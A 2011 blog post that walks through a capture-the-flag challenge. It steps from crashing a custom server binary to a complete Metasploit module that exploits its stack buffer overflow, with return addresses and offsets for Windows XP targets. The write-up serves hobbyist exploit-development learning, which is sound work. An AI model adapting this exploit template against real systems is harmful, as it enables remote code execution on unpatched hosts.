Wednesday, February 9, 2011

From vulnerability to exploit under 5 min

Almost a month ago in the excellent group of NOVA Hackers! ( http://novahackers.blogspot.com/ ), a group of security professionals, security enthusiasts and friends a capture the flag challenge was posted. In that challenge one should find a way to exploit a binary file ( http://novactf.org/files/ctf-january-2011-files.rar ) that is listening on a specific port and write a metasploit exploit module . The ctf challenge was not meant to be extremely difficult it was meant to be for fun. Let's see how using the proper tools, one can write a metasploit, exploit, module under 5 min.

Tools that you will need, and tools that i like to work with,
Immunity Debugger ( http://www.immunityinc.com/products-immdbg.shtml )
Pvefindaddr ( http://redmine.corelan.be:8800/projects/pvefindaddr )
Metasploit Framework ( http://www.metasploit.com/framework/download/ )

Let's see how simple could be to write a simple buffer overflow with the proper tools.

Phase 1.
Fire up the debugger open the file,
Phase 2.
Start the executable from the debugger, pressing F9 or the run button.

Phase 3.
Generate a string of characters and send it to crash the application using metasploit
Phase 4.
At this point the application is crashed and the debugger will be displaying an Access Violation, for our good chance several registers are overwritten also with our string,
Phase 5.
Pvefindaddr to the rescue! This is almost considering cheating writing an exploit with the help of pvefinaddr, let's make it quick then, execute !pvefindaddr suggest on the debugger and check the log for the results.
What else could we ask from the tool, maybe to write the metasploit module by itself and post it on the exploit-db.com :-)

Phase 6.
Take the data and put them in a nice metasploit module. What is left here is a proper jmp eax instruction, pvefindaddr again will give us what we need.
Phase 7.
Take a simple metasploit exploit template ( http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ ) or from any other module in the metasploit directory add your values and you are done !

#
# Custom metasploit exploit
# Written by Nicolas Krassas
# Date 24/01/2011
# This is initial version
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

      include Msf::Exploit::Remote::Tcp

      def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Custom vulnerable server stack overflow',
                        'Description'    => %q{
                                        This module exploits a stack overflow in a
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Nicolas Krassas' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1000,
                                        'BadChars' => "",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP2 Eng',
                                          { 'Ret' => 0x662F3435, 'Offset' => 260 } ],
                                        ['Windows XP SP3 Eng',
                                          { 'Ret' => 0x662F3425, 'Offset' => 260 } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(1337)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(4) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end
end



Did it took 5 min, maybe not but it's neither far from it. Another nice tutorial on metasploit exploit code development using pvefindaddr that you can find is from sickness at Exploit Development Made Easy with !pvefindaddr .

2 comments:

  1. Very nice... I've never attempted to write a metasploit plugin, but you've inspired me to at LEAST look at the framework/api.

    Thanks
    INFOSECSchool.com

    ReplyDelete
  2. Download SecurityTube Metasploit Framework Expert DVD FREE Enjoy ;)

    securitytube-training.com/certifications/securitytube-metasploit-framework-expert/?id=download ;)

    ReplyDelete